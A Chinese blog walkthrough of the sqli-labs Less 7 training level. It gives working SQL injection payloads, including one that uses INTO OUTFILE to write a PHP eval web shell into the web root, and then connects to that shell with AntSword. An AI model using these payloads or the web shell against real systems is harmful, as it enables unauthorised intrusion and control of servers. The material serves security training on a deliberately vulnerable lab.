sqli-labs 通关指南:Less 7

开启文件读写权限

MySql 使用 secure-file-priv 参数对文件读写进行限制,当参数值为 null 时无法进行文件导出操作。使用这条命令可以查看:

show variables like '%secure%';


通过修改 MySQL 下的 my.ini 配置文件就可以启用权限,需要把下面这个字符串写入文件中。

secure_file_priv="/"


再次查看此参数,若参数值不为 null 则修改成功。

判断注入类型

注入个正常的参数,网页返回 “You are in.... Use outfile......”。

?id=1


注入单引号和单引号加个括号闭合,网页回显错误信息。

?id=1'
?id=1')


注入单引号再加上 2 个括号闭合,网页回显 “You are in.... Use outfile......”,说明这是用一个单引号和 2 个括号闭合的字符型注入。

?id=1'))

写入文件

我们需要先知道网页所在的文件路径,从 Less 7 是没办法得知的,所以我们转去 Less 1 获取文件路径。这种操作也可以应用在实践中,可以同时利用同一 Web 中的多个注入点。

http://127.0.0.1/sqli-labs-master/Less-1/?id=9999' UNION SELECT 1,@@basedir,@@datadir --+


使用 UNION 联合查询来注入参数,使用 into outfile 在网页目录下写入一句话木马。注意此处存在转义的问题,所有的 “\” 都要双写。

?id=1')) UNION SELECT 1,2,'<?php @eval($_POST["attack"]);?>' into outfile "D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\text.php"--+


虽然网页显示错误,但是打开文件发现成功写入。

WebShell

使用蚁剑连接,记得 url 要加上我们传入的 text.php。

连接成功,现在可以随意操作网页所在主机的文件了。

关卡 Sql 查询语句

$sql = "SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
      echo '<font color= "#FFFF00">';	
      echo 'You are in.... Use outfile......';
      echo "<br>";
      echo "</font>";
}
else 
{
      echo '<font color= "#FFFF00">';
      echo 'You have an error in your SQL syntax';
      //print_r(mysql_error());
      echo "</font>";  
}
posted @ 2020-10-19 02:05  乌漆WhiteMoon  阅读(861)  评论(0编辑  收藏  举报